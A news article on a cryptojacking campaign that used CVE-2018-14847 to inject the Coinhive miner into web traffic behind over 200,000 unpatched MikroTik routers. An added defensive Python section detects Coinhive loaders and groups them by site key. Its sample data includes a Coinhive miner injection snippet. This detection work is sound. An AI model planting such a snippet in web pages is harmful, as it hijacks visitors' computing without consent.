This Cryptojacking Campaign Infected Over 200,000 MikroTik Routers

A cryptojacking campaign infected more than 200,000 MikroTik routers that were still unpatched four months after the security fix for the vulnerability was released.

The vulnerability CVE-2018-14847 in MikroTik routers was used by illicit crypto miners to inject the Coinhive script into web pages visited by users. Initially, attackers infected thousands of routers in Brazil, as reported by SpiderLabs, a security research company.

“Our researcher @Simon_Kenin has discovered a massive #IoT #cryptojacking campaign affecting tens of thousands of unpatched @mikrotik_com routers in Brazil and going global. Read more here”

The vulnerability in MikroTik Ethernet and Wi-Fi routers allowed attackers to bypass the authentication step and quickly gain control over the device. This attack was identified back in April, and as a result, the router maker released a security patch.

It all started in Brazil

The researchers found that the Coinhive script was first introduced in 175,000 routers based in Brazil. With a second Coinhive site key, it infected an additional 25,000 routers in the Republic of Moldova, researcher Troy Mursch reported.

The infection spread rapidly to all websites visited by users behind the routers. To avoid detection, the attacker then limited the crypto mining script to error pages only. Furthermore, the attacker removed any trace from the router after it was compromised.
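As an added example (not part of the article or the researchers' tooling), the following Python scans captured HTTP response bodies for the Coinhive loader and site key, groups devices by site key, and marks keys seen only on error responses. The regexes follow Coinhive's public JavaScript API; the sample responses, addresses and keys are constructed.

```python
import re
from collections import defaultdict

# Patterns follow Coinhive's public JavaScript API: a loader script tag plus a
# CoinHive.Anonymous/User/Token constructor whose first argument is the site key.
LOADER_RE = re.compile(r"<script[^>]+src\s*=\s*[\"'][^\"']*coinhive(?:\.min)?\.js", re.I)
KEY_RE = re.compile(r"CoinHive\.(?:Anonymous|User|Token)\(\s*[\"']([A-Za-z0-9]+)[\"']")

def scan_body(body):
    """Return (loader_present, [site keys]) for one HTML body."""
    return bool(LOADER_RE.search(body)), KEY_RE.findall(body)

def group_by_site_key(responses):
    """Map each site key to the devices serving it and whether it was
    only ever seen on HTTP error responses (status >= 400)."""
    hosts = defaultdict(set)
    statuses = defaultdict(set)
    for r in responses:
        loader, keys = scan_body(r["body"])
        if not loader:
            continue  # a key string without the loader is not an active miner
        for key in keys:
            hosts[key].add(r["device"])
            statuses[key].add(r["status"])
    return {
        k: {"devices": sorted(hosts[k]),
            "error_pages_only": all(s >= 400 for s in statuses[k])}
        for k in hosts
    }

# Constructed sample data: addresses are from documentation ranges and the
# site keys are made up; none of it comes from the campaign.
MINER = ('<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
         "<script>new CoinHive.Anonymous('{key}').start();</script>")
SAMPLE = [
    {"device": "192.0.2.10", "status": 200, "body": "<html>" + MINER.format(key="EXAMPLEKEYAAAA") + "</html>"},
    {"device": "192.0.2.11", "status": 403, "body": "<h1>Error</h1>" + MINER.format(key="EXAMPLEKEYAAAA")},
    {"device": "198.51.100.7", "status": 404, "body": "<h1>Not found</h1>" + MINER.format(key="EXAMPLEKEYBBBB")},
    {"device": "198.51.100.8", "status": 200, "body": "<html><p>clean page</p></html>"},
]

if __name__ == "__main__":
    for key, info in group_by_site_key(SAMPLE).items():
        print(key, info)
```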

The cryptojacking campaign mainly targets MikroTik routers located in Brazil. It is assumed that a large number of routers were not updated after the security issue was fixed four months ago, meaning that these routers remain at major risk of being attacked again.

“There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, each device serves at least tens if not hundreds of users daily,” Simon Kenin, a security researcher at SpiderLabs, reported.
